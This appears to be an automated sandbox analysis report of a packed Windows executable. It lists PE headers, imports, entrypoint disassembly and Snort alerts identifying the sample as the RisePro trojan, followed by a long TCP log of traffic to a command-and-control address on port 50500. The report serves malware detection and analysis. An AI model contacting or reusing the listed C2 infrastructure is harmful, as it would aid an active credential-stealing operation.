File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........x...+...+...+z.....+z.....+z.....+k\....+k\....+z.....+...+(..+k\....+Z_....+Z_....+Z_....+Rich...+........PE..L..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x407452
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66810E71 [Sun Jun 30 07:51:13 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	bea8657593f34831fef16a15915f462d

Entrypoint Preview

Instruction
call 00007F65DD01566Eh
jmp 00007F65DD014D29h
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007F65DD014ECBh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007F65DD014EBCh
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007F65DD014EBEh
add edx, 28h
cmp edx, esi
jne 00007F65DD014E9Ch
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007F65DD014EABh
push esi
call 00007F65DD015944h
test eax, eax
je 00007F65DD014ED2h
mov eax, dword ptr fs:[00000018h]
mov esi, 005C3E30h
mov edx, dword ptr [eax+04h]
jmp 00007F65DD014EB6h
cmp edx, eax
je 00007F65DD014EC2h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007F65DD014EA2h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007F65DD014EB9h
mov byte ptr [005C3E34h], 00000001h
call 00007F65DD01516Ah
call 00007F65DD017ED7h
test al, al
jne 00007F65DD014EB6h
xor al, al
pop ebp
ret
call 00007F65DD0216A4h
test al, al
jne 00007F65DD014EBCh
push 00000000h
call 00007F65DD017EDEh
pop ecx
jmp 00007F65DD014E9Bh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
cmp byte ptr [005C3E35h], 00000000h
je 00007F65DD014EB6h
mov al, 01h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x2f5c0	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2f610	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1c5000	0x1d1c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2d868	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2d7a8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x25000	0x164	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x22e06	0x23000	1ed7c60eacd9fb30d5cd312ea45f8d4a	False	0.569775390625	data	6.64928441285862	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.BsS	0x24000	0xe1d	0x1000	4310b8ffa7162aab1a88f92f5d7848e1	False	0.5712890625	data	5.975160347310368	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x25000	0xae34	0xb000	212397fb0634aabe665c0e82bcd6cccc	False	0.42329545454545453	data	5.046038259848028	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x30000	0x194934	0x193a00	29af519b8de1367d627fe18b75ef1ad5	False	0.9979742906085476	data	7.999418911904547	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x1c5000	0x1d1c	0x1e00	728a4d3febaf513a93810bef65bbe4a6	False	0.7657552083333333	data	6.493187413611282	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

USER32.dll

OffsetRect

KERNEL32.dll

CreateFileW, HeapSize, GetProcessHeap, SetStdHandle, WaitForSingleObject, CreateThread, VirtualAlloc, GetModuleHandleA, GetProcAddress, GetConsoleWindow, CloseHandle, WaitForSingleObjectEx, GetCurrentThreadId, GetExitCodeThread, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, QueryPerformanceCounter, ReleaseSRWLockExclusive, WakeAllConditionVariable, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, SetEnvironmentVariableW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, GetFileType, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW

Exports

Name	Ordinal	Address
IUAhsiuchniuohAIU	1	0x424d00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/01/24-09:16:35.352447	TCP	2046266	ET TROJAN [ANY.RUN] RisePro TCP (Token)	50500	49802	77.105.132.27	192.168.2.4
07/01/24-09:16:07.227239	TCP	2046266	ET TROJAN [ANY.RUN] RisePro TCP (Token)	50500	49747	77.105.132.27	192.168.2.4
07/01/24-09:16:07.459810	TCP	2046267	ET TROJAN [ANY.RUN] RisePro TCP (External IP)	50500	49747	77.105.132.27	192.168.2.4
07/01/24-09:16:32.178451	TCP	2046266	ET TROJAN [ANY.RUN] RisePro TCP (Token)	50500	49787	77.105.132.27	192.168.2.4
07/01/24-09:16:06.660397	TCP	2049060	ET TROJAN RisePro TCP Heartbeat Packet	49747	50500	192.168.2.4	77.105.132.27
07/01/24-09:16:13.442392	TCP	2046269	ET TROJAN [ANY.RUN] RisePro TCP (Activity)	49747	50500	192.168.2.4	77.105.132.27
07/01/24-09:16:20.238290	TCP	2046266	ET TROJAN [ANY.RUN] RisePro TCP (Token)	50500	49756	77.105.132.27	192.168.2.4
07/01/24-09:16:32.076820	TCP	2046266	ET TROJAN [ANY.RUN] RisePro TCP (Token)	50500	49786	77.105.132.27	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 1, 2024 09:16:06.636426926 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:06.643714905 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:06.643804073 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:06.660397053 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:06.671391010 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:07.227238894 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:07.282758951 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:07.367515087 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:07.367680073 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:07.372632027 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:07.459810019 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:07.501526117 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:07.577681065 CEST	49748	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:07.577716112 CEST	443	49748	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:07.577800989 CEST	49748	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:07.578969955 CEST	49748	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:07.578984022 CEST	443	49748	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:08.063460112 CEST	443	49748	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:08.063607931 CEST	49748	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:08.065310001 CEST	49748	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:08.065321922 CEST	443	49748	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:08.065602064 CEST	443	49748	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:08.110780954 CEST	49748	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:08.113689899 CEST	49748	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:08.156510115 CEST	443	49748	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:08.246759892 CEST	443	49748	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:08.246885061 CEST	443	49748	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:08.246953964 CEST	49748	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:08.255422115 CEST	49748	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:08.255470037 CEST	443	49748	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:08.255486012 CEST	49748	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:08.255494118 CEST	443	49748	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:08.269376040 CEST	49749	443	192.168.2.4	104.26.4.15
Jul 1, 2024 09:16:08.269418001 CEST	443	49749	104.26.4.15	192.168.2.4
Jul 1, 2024 09:16:08.269474983 CEST	49749	443	192.168.2.4	104.26.4.15
Jul 1, 2024 09:16:08.269877911 CEST	49749	443	192.168.2.4	104.26.4.15
Jul 1, 2024 09:16:08.269887924 CEST	443	49749	104.26.4.15	192.168.2.4
Jul 1, 2024 09:16:08.753448963 CEST	443	49749	104.26.4.15	192.168.2.4
Jul 1, 2024 09:16:08.753637075 CEST	49749	443	192.168.2.4	104.26.4.15
Jul 1, 2024 09:16:08.762902021 CEST	49749	443	192.168.2.4	104.26.4.15
Jul 1, 2024 09:16:08.762924910 CEST	443	49749	104.26.4.15	192.168.2.4
Jul 1, 2024 09:16:08.763348103 CEST	443	49749	104.26.4.15	192.168.2.4
Jul 1, 2024 09:16:08.775177002 CEST	49749	443	192.168.2.4	104.26.4.15
Jul 1, 2024 09:16:08.820501089 CEST	443	49749	104.26.4.15	192.168.2.4
Jul 1, 2024 09:16:08.994697094 CEST	443	49749	104.26.4.15	192.168.2.4
Jul 1, 2024 09:16:08.994787931 CEST	443	49749	104.26.4.15	192.168.2.4
Jul 1, 2024 09:16:08.994849920 CEST	49749	443	192.168.2.4	104.26.4.15
Jul 1, 2024 09:16:08.995058060 CEST	49749	443	192.168.2.4	104.26.4.15
Jul 1, 2024 09:16:08.995074034 CEST	443	49749	104.26.4.15	192.168.2.4
Jul 1, 2024 09:16:08.995085955 CEST	49749	443	192.168.2.4	104.26.4.15
Jul 1, 2024 09:16:08.995091915 CEST	443	49749	104.26.4.15	192.168.2.4
Jul 1, 2024 09:16:08.995551109 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:09.000762939 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:09.220602989 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:09.267133951 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:09.329862118 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:09.334829092 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:09.547700882 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:09.548468113 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:09.553297043 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:09.752069950 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:09.752887011 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:09.752945900 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:09.767312050 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:09.772193909 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:09.987180948 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:10.032638073 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:10.095257998 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:10.100147009 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:10.327142954 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:10.376401901 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:11.997963905 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.001842976 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.002788067 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.006711006 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.006730080 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.006740093 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.006771088 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.006781101 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.006804943 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.006814957 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.006823063 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.006855965 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.006879091 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.006906986 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.006931067 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.006941080 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.006977081 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.007045031 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.011595964 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.011672974 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.011682987 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.011694908 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.011698961 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.011704922 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.011734962 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.011760950 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.011765003 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.011785030 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.011815071 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.011871099 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.011883020 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.011889935 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.011936903 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.011941910 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.011950016 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.012000084 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.016534090 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.016632080 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.016762972 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.016776085 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.016822100 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.016832113 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.016843081 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.016855001 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.016897917 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.016927958 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.016930103 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.016958952 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.016967058 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.017020941 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.017025948 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.017030954 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.017076969 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.017113924 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.017131090 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.017216921 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.017226934 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.017227888 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.017236948 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.017252922 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.017262936 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.017271996 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.017280102 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.017280102 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.017292023 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.017292976 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.017302990 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.017313004 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.017326117 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.017328024 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.017355919 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.017370939 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.017374039 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.017385006 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.017445087 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.017515898 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.017573118 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.017834902 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.017908096 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.021475077 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.021483898 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.021492958 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.021579981 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.021601915 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.021686077 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.021697998 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.021714926 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.021744967 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.021747112 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.021789074 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.021799088 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.021807909 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.021817923 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.021872044 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.021889925 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.021899939 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.021951914 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.021986961 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.021996975 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.022051096 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.022053003 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022069931 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022079945 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022089005 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022121906 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.022181988 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022188902 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.022192955 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022206068 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022214890 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022224903 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022233009 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022243023 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022252083 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022257090 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.022281885 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.022305965 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.022345066 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022355080 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022365093 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022375107 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022384882 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022398949 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022408009 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.022408009 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022419930 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022435904 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.022458076 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.022496939 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.022515059 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022526979 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022533894 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022545099 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022555113 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022572041 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022581100 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022583008 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.022589922 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022600889 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022609949 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022618055 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022618055 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.022628069 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022636890 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.022636890 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022646904 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022667885 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.022687912 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.022710085 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.022727013 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022738934 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022749901 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022758961 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022780895 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.022780895 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022809982 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.022869110 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022876024 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.022881031 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022923946 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:12.022944927 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022954941 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:12.022964001 CEST	50500	49747	77.105.132.27	192.168.2.4
